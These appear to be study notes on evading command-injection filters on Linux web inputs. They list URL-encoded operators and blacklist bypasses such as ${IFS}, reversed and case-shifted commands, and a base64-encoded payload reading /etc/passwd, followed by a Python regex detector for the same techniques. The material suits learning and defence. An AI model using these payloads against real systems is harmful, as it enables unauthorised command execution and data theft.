Notes

Injection Operators

; : %3b

\n : %0a

& : %26

| : %7c

&& : %26%26

|| : %7c%7c

`` : %60%60

$() : %24%28%29

Linux

Filtered Character Bypass

printenv

Spaces

%09 Using tabs instead of spaces

${IFS} Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())

{ls,-la} Commas will be replaced with spaces

${PATH:0:1} Will be replaced with /

${LS_COLORS:10:1} Will be replaced with ;

$(tr '!-}' '"-~'<<<[) Shift character by one ([ -> \)

Blacklisted Command Bypass

Character Insertion

' or " Total must be even

$@ or \ Linux only

Case Manipulation

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") Execute command regardless of case

$(a="WhOaMi";printf %s "${a,,}") Another variation of the technique

Reversed Commands

echo 'whoami' | rev Reverse a string

$(rev<<<'imaohw') Execute reversed command

Encoded Commands

echo -n 'cat /etc/passwd | grep 33' | base64 Encode a string with base64

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) Execute b64 encoded string
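Detection example (added here, not part of the original notes): a Python sketch that URL-decodes a request parameter and flags the operators and bypass forms listed above. The rule names, the scan() helper and the sample values for a hypothetical "ip" parameter are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# One rule per technique in the notes; patterns run on the URL-decoded value.
# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("injection-operator", re.compile(r"[;\n&|`]|\$\(")),
    ("space-substitute", re.compile(r"\t|\$\{?IFS\}?")),
    ("brace-expansion", re.compile(r"\{[^{}\s,]+(?:,[^{}\s,]+)+\}")),
    ("env-substring", re.compile(r"\$\{\w+:\d+:\d+\}")),
    ("quote-insertion", re.compile(r"\w(?:['\"]|\$@|\\)\w")),
    ("tr-here-string", re.compile(r"\btr\b.*<<<")),
    ("case-expansion", re.compile(r"\$\{\w+(?:,,|\^\^)\}")),
    ("reversed-command", re.compile(r"\brev\b")),
    ("base64-decode", re.compile(r"\bbase64\s+(?:-d|--decode)\b")),
]


def scan(raw_value):
    """Return the names of every rule that matches the decoded value."""
    decoded = unquote(raw_value)  # %0a -> newline, %7c -> |, and so on
    return [name for name, rx in RULES if rx.search(decoded)]


# Constructed sample values, built only from entries in the notes above.
SAMPLES = [
    "192.168.1.10",                         # expected input, no findings
    "127.0.0.1%0a{ls,-la}",                 # encoded newline + brace expansion
    "127.0.0.1${LS_COLORS:10:1}${IFS}",     # no literal operator or space at all
    "127.0.0.1%7c%7c$(rev<<<'imaohw')",     # reversed command in a sub-shell
    "127.0.0.1%0aw'h'o'am'i",               # quotes inserted into a command word
]


def report(samples=SAMPLES):
    """Map each sample to the list of rules it triggered."""
    return {value: scan(value) for value in samples}


if __name__ == "__main__":
    for value, hits in report().items():
        print(f"{value!r:45} -> {hits or 'clean'}")
```

The third sample contains no literal operator or space, so a filter that only blocks the characters in the first list misses it. These rules are triage heuristics (an apostrophe in ordinary text also trips quote-insertion); the durable fix is to keep user input out of a shell and validate it against an allowlist.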
